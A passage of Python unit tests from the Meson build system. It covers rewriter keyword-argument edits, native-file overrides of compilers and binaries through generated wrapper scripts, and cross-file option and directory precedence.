'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
if isinstance(v, (bool, int, float)):
f.write("{}={}\n".format(k, v))
elif isinstance(v, list):
f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v])))
else:
f.write("{}='{}'\n".format(k, v))
return filename
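# Illustrative example (hypothetical values, not part of the original suite): given
#   values = {'binaries': {'bash': '/usr/bin/bash'}, 'built-in options': {'werror': True}}
# helper_create_native_file() writes a file along the lines of:
#   [binaries]
#   bash='/usr/bin/bash'
#   [built-in options]
#   werror=True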
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
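# Illustrative usage (hypothetical arguments): a wrapper created with
#   wrapper = self.helper_create_binary_wrapper('bash', version='12345')
# answers `wrapper --version` by printing '12345' and exiting 0, while any
# other command line is forwarded to the real 'bash'. On Windows the returned
# path is a .bat file that chains into the generated python script.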
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
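# The cb callback receives the detected compiler object and returns a tuple of
# (binary_to_use, expected_compiler_id); a minimal sketch for C, assuming both
# gcc and clang are installed:
#   def cb(comp):
#       return ('clang', 'clang') if comp.id == 'gcc' else ('gcc', 'gcc')
#   self.helper_for_compiler('c', cb)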
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('llvm-config not installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We may not have python2, so check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for Windows (Windows build, Linux host),
# but we don't support that ATM, so let's not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '43 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0),
('CaseSenSiTivE', 'SOME other Value'),
('CASESENSITIVE', 'some other Value')]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_user_options_command_line_overrides(self):
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '79 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '43 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_option_bool(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'werror': True}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that non-per-subproject options are inherited from the parent
if 'werror' in each['name']:
self.assertEqual(each['value'], True)
break
else:
self.fail('Did not find werror in build options?')
def test_option_integer(self):
# Integers are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that non-per-subproject options are inherited from the parent
if 'unity_size' in each['name']:
self.assertEqual(each['value'], 100)
break
else:
self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('Did not find cpp_std in build options?')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/foo'])
break
else:
self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '102 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
# Test that non-per-subproject options are inherited from the parent
if 'c_args' in each['name']:
# This path will be hit twice, once for build and once for host,
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
self.assertEqual(found, 4, 'Did not find all expected options')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertIn('Parent should override default_library', cm.exception.stdout)
def test_builtin_options_subprojects_dont_inherits_parent_override(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
self.init(testcase, extra_args=['--native-file', config])
def test_builtin_options_compiler_properties(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'c_args': ['-DFOO']},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DFOO'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_compiler_properties_legacy(self):
# The legacy placement in properties is still valid if a 'built-in
# options' section is present but doesn't contain the lang_args
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DBAR'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_paths(self):
# the paths section can set directories like bindir, and those need to be
# overridden by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'bindir': 'foo'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'foo')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def setUp(self):
super().setUp()
self.current_config = 0
self.current_wrapper = 0
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
return textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
{}
[properties]
needs_exe_wrapper = {}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc,
'exe_wrapper = {}'.format(str(exe_wrapper)) if exe_wrapper is not None else '',
needs_exe_wrapper))
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, so mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def helper_create_cross_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_user_options(self):
# This is just a smoke test for the cross file, since the implementation
# shares code after loading from the files
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--cross-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--cross-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('No c++ standard set?')
def test_builtin_options_per_machine(self):
"""Test options that are allowed to be set on a per-machine basis.
Such options could be passed twice, once for the build machine, and
once for the host machine. I've picked pkg-config path, but any option
that can be set for both would do.
"""
testcase = os.path.join(self.common_test_dir, '2 cpp')
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
# Ensure that PKG_CONFIG_PATH is not set in the environment
with mock.patch.dict('os.environ'):
for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
try:
del os.environ[k]
except KeyError:
pass
self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross/path'])
found += 1
elif each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++17')
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native/path'])
found += 1
elif each['name'] == 'build.cpp_std':
self.assertEqual(each['value'], 'c++14')
found += 1
if found == 4:
break
self.assertEqual(found, 4, 'Did not find all sections.')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native'}})
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross'}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native'])
found += 1
if found == 2:
break
self.assertEqual(found, 2, 'Did not find all sections.')
